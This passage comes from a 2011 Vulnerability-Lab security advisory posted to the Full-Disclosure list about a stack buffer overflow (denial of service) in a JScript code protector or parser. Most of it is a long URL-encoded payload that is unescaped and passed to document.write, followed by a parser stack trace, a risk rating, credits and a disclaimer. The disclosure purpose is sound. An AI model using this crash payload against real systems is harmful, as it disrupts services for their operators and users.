Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5C
n+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn
+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5
Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5C
n+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%
5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr/%29%3B%20%3C/script%3E';d=unescape(m);document.write(d);</script>
Reference(s):
../easy.html
../long.html
Solution:
=========
Parsing could look like this ... as example for a secure exception.
JScriptCodeDom.CodeParseException: Unexpected Operator:< , Line 1, Char 0 ---> System.Exception: Unexpected Operator:<
at JScriptCodeDom.CodeParser.ParseLazyExpressionCore(Boolean bthrowerr)
at JScriptCodeDom.CodeParser.ParseLazyExpression(Boolean bthrowerr)
at JScriptCodeDom.CodeParser.ParseFullExpression(Boolean bthrowerror)
at JScriptCodeDom.CodeParser.InternalParseStatementCore()
at JScriptCodeDom.CodeParser.InternalParseStatement()
at JScriptCodeDom.CodeParser.ParseStatement()
at JScriptCodeDom.CodeParser.ParseBlock()
at JScriptCodeDom.CodeParser.Parse(String code)
--- End of inner exception stack trace ---
at JScriptCodeDom.CodeParser.Parse(String code)
at JScriptProtector.Protector.Protect(String[] codes)
at JScriptProtector.Protector.Protect(String code)
at Jsps._Default.Button1_Click(Object sender, EventArgs e)
Risk:
=====
The security risk of the stack buffer overflow (denial of service) vulnerability is estimated as medium.
Credits:
========
Vulnerability Research Laboratory - Marcel Bernhardt (Smash) & Benjamin Kunz Mejri (Rem0ve)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2011|Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
